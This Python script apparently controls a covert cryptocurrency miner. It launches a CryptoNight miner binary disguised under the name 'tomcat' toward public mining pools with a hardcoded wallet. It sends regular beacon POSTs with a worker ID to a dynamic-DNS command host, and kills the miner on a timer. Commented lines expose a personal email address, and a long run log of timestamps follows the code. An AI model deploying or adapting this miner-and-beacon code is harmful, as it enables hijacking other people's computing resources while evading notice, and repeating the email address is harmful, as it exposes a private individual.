import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:48:05.220724
#2018-02-17 16:33:07.795854
#2018-02-17 18:21:04.383603
#2018-02-17 20:09:05.093775
#2018-02-17 21:56:04.106610
#2018-02-17 23:41:01.529638
#2018-02-18 01:31:06.029737
#2018-02-18 03:17:05.362758
#2018-02-18 05:05:03.404608
#2018-02-18 06:56:01.923848
#2018-02-18 08:44:01.319088
#2018-02-18 10:31:05.619258
#2018-02-18 12:16:06.286713
#2018-02-18 14:03:03.870621
#2018-02-18 15:53:05.670150
#2018-02-18 17:43:05.140436
#2018-02-18 19:30:06.946033
#2018-02-18 21:15:06.972759
#2018-02-18 23:03:01.435897
#2018-02-19 00:50:01.599136
#2018-02-19 02:37:02.007936
#2018-02-19 04:23:05.498982
#2018-02-19 06:08:02.141571
#2018-02-19 07:56:07.470761
#2018-02-19 09:47:04.008653
#2018-02-19 11:35:10.549406
#2018-02-19 13:22:09.431116
#2018-02-19 15:11:05.787933
#2018-02-19 16:58:07.677757
#2018-02-19 18:45:10.094155
#2018-02-19 20:38:01.828529
#2018-02-19 22:24:03.923200
#2018-02-20 00:10:03.099704
#2018-02-20 01:56:04.678892
#2018-02-20 03:47:06.398087
#2018-02-20 05:31:05.138032
#2018-02-20 07:15:07.012797
#2018-02-20 09:02:04.161365
#2018-02-20 10:45:03.460924
#2018-02-20 12:32:01.590180
#2018-02-20 14:18:04.253448
#2018-02-20 16:03:04.536479
#2018-02-20 17:48:10.214457
#2018-02-20 19:39:09.111904
#2018-02-20 21:27:07.006590
#2018-02-20 23:10:08.089220
#2018-02-21 00:55:01.515522
#2018-02-21 02:41:04.662227
#2018-02-21 04:28:07.958733
#2018-02-21 06:17:07.421829
#2018-02-21 08:03:06.813095
#2018-02-21 09:48:01.645244
#2018-02-21 11:38:06.684787
#2018-02-21 13:27:08.361511
#2018-02-21 15:12:01.990842
#2018-02-21 17:02:07.843723
#2018-02-21 18:51:10.166713
#2018-02-21 20:40:09.482946
#2018-02-21 22:25:08.129060
#2018-02-22 00:14:05.783108
#2018-02-22 02:02:01.355180
#2018-02-22 03:47:07.340996
#2018-02-22 05:35:06.910128
#2018-02-22 07:20:07.472038
#2018-02-22 09:08:01.386024
#2018-02-22 10:55:07.832865
#2018-02-22 12:41:06.974897
#2018-02-22 14:28:09.665691
#2018-02-22 16:15:07.434592
#2018-02-22 18:01:09.000256
#2018-02-22 19:49:06.990813
#2018-02-22 21:38:07.015353
#2018-02-22 23:24:07.189602
#2018-02-23 01:11:04.612514
#2018-02-23 02:59:05.566425
#2018-02-23 04:46:07.868055
#2018-02-23 06:32:03.588233
#2018-02-23 08:18:06.457000
#2018-02-23 10:36:01.803871
#2018-02-23 12:31:06.539800
#2018-02-23 14:18:01.932913
#2018-02-23 16:08:09.768292
#2018-02-23 17:53:07.631528
#2018-02-23 19:38:07.877726
#2018-02-23 21:21:06.665665
#2018-02-23 23:09:04.311272
#2018-02-24 00:56:07.667370
#2018-02-24 02:51:01.879392
#2018-02-24 04:40:07.731133
#2018-02-24 06:23:07.859724
#2018-02-24 08:11:04.073843
#2018-02-24 09:55:04.032422
#2018-02-24 11:50:08.597874
#2018-02-24 13:42:04.746193
#2018-02-24 15:29:05.025209
#2018-02-24 17:23:03.887983
#2018-02-24 19:11:01.469910
#2018-02-24 20:59:01.508660
#2018-02-24 23:27:05.966575
#2018-02-25 03:44:06.495658
#2018-02-25 07:29:04.750298